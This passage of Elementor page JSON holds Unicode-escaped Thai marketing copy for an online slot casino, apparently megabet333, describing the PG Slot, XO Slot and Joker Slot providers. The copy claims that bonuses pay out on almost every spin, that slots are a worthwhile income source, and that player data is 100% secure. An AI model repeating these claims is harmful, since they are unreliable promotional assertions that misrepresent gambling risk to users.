\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% 